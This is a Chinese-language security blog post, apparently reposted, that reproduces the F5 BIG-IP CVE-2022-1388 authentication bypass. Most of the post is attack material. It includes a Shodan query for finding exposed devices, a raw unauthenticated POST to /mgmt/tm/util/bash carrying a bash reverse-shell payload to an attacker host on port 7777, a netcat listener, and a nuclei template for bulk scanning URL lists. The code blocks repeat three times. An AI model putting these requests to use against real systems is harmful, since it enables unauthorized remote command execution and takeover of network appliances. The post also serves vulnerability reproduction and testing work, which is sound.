CVE-2022-1388 F5 BIG-IP RCE

01555

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 CVE-2022-1388 F5 BIG-IP RCE

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

F5官网发布安全公告,披露F5 BIG-IP存在一处远程代码执行漏洞(CVE-2022-1388)。漏洞存在于iControl REST组件中,未经身份验证的攻击者可以发送请求绕过BIG-IP中的iControl REST认证,进而导致可以在目标主机上执行任意系统命令、创建或删除文件或禁用BIG-IP上的服务。

图片[1]-CVE-2022-1388 F5 BIG-IP RCE-安全小天地

0x03 漏洞复现

漏洞影响:

  • BIG-IP 16.x: 16.1.0 – 16.1.2
  • BIG-IP 15.x: 15.1.0 – 15.1.5
  • BIG-IP 14.x: 14.1.0 – 14.1.4
  • BIG-IP 13.x: 13.1.0 – 13.1.4
  • BIG-IP 12.x: 12.1.0 – 12.1.6
  • BIG-IP 11.x: 11.6.1 – 11.6.5
  • shodan:http.title:”BIG-IP®-+Redirect” +”Server”

1.执行反弹shell命令

POST /mgmt/tm/util/bash HTTP/1.1
Host: x.x.x.x
Content-Length: 85
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0a
X-F5-Auth-Token: a
Authorization: Basic YWRtaW46xxxxx=
{\"command\":\"run\",
\"utilCmdArgs\":\"-c \'bash -i >& /dev/tcp/x.x.x.x/7777 0>&1\'\"}
POST /mgmt/tm/util/bash HTTP/1.1
Host: x.x.x.x
Content-Length: 85
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0a
X-F5-Auth-Token: a
Authorization: Basic YWRtaW46xxxxx=

{\"command\":\"run\",
\"utilCmdArgs\":\"-c \'bash -i >& /dev/tcp/x.x.x.x/7777 0>&1\'\"}
POST /mgmt/tm/util/bash HTTP/1.1
Host: x.x.x.x
Content-Length: 85
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0a
X-F5-Auth-Token: a
Authorization: Basic YWRtaW46xxxxx=

{\"command\":\"run\",
\"utilCmdArgs\":\"-c \'bash -i >& /dev/tcp/x.x.x.x/7777 0>&1\'\"}
图片[2]-CVE-2022-1388 F5 BIG-IP RCE-安全小天地

3. nc监听得到shell

nc -lnvp 7777
nc -lnvp 7777
nc -lnvp 7777

4.使用nuclei批量验证1.txt文件中的url是否存在该漏洞,显示存在漏洞。(nuclei稳定快,编写poc简单,有社区维护,推荐使用)

nuclei下载地址:https://github.com/projectdiscovery/nuclei

批量验证命令:
nuclei -list 1.txt -t CVE-2022-1388.yaml
yaml POC:
id: CVE-2022-1388
info:
  name: F5 BIG-IP iControl REST Auth Bypass RCE
  author: dwisiswant0
  severity: critical
  description: |
    This vulnerability may allow an unauthenticated attacker
    with network access to the BIG-IP system through the management
    port and/or self IP addresses to execute arbitrary system commands,
    create or delete files, or disable services. There is no data plane
    exposure; this is a control plane issue only.
  reference:
    - https://twitter.com/GossiTheDog/status/1523566937414193153
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2022-1388
    cwe-id: CWE-306
  tags: cve
variables:
  auth: \"admin:\"
requests:
  - raw:
      - |
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json
        {
          \"command\": \"run\",
          \"utilCmdArgs\": \"-c \'echo ryaqkj\'\"
        }
    matchers:
      - type: word
        words:
          - \"commandResult\"
          - \"ryaqkj\"
        condition: and
批量验证命令:
nuclei -list 1.txt -t CVE-2022-1388.yaml

yaml POC:
id: CVE-2022-1388

info:
  name: F5 BIG-IP iControl REST Auth Bypass RCE
  author: dwisiswant0
  severity: critical
  description: |
    This vulnerability may allow an unauthenticated attacker
    with network access to the BIG-IP system through the management
    port and/or self IP addresses to execute arbitrary system commands,
    create or delete files, or disable services. There is no data plane
    exposure; this is a control plane issue only.
  reference:
    - https://twitter.com/GossiTheDog/status/1523566937414193153
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2022-1388
    cwe-id: CWE-306
  tags: cve

variables:
  auth: \"admin:\"

requests:
  - raw:
      - |
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json

        {
          \"command\": \"run\",
          \"utilCmdArgs\": \"-c \'echo ryaqkj\'\"
        }

    matchers:
      - type: word
        words:
          - \"commandResult\"
          - \"ryaqkj\"
        condition: and

批量验证命令:
nuclei -list 1.txt -t CVE-2022-1388.yaml

yaml POC:
id: CVE-2022-1388

info:
  name: F5 BIG-IP iControl REST Auth Bypass RCE
  author: dwisiswant0
  severity: critical
  description: |
    This vulnerability may allow an unauthenticated attacker
    with network access to the BIG-IP system through the management
    port and/or self IP addresses to execute arbitrary system commands,
    create or delete files, or disable services. There is no data plane
    exposure; this is a control plane issue only.
  reference:
    - https://twitter.com/GossiTheDog/status/1523566937414193153
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2022-1388
    cwe-id: CWE-306
  tags: cve

variables:
  auth: \"admin:\"

requests:
  - raw:
      - |
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json

        {
          \"command\": \"run\",
          \"utilCmdArgs\": \"-c \'echo ryaqkj\'\"
        }

    matchers:
      - type: word
        words:
          - \"commandResult\"
          - \"ryaqkj\"
        condition: and
------本文已结束,感谢您的阅读------
THE END
技术教程
# 漏洞复现# cve# CVE-2022-1388# F5 BIG-IP RCE
喜欢就支持一下吧
点赞5 分享
Time and experience heals pain.
时间和经历会抚平一切伤痛
C语言教程的头像,网络安全爱好者中心-神域博客网
相关推荐
评论 抢沙发

请登录后发表评论

    暂无评论内容

文章目录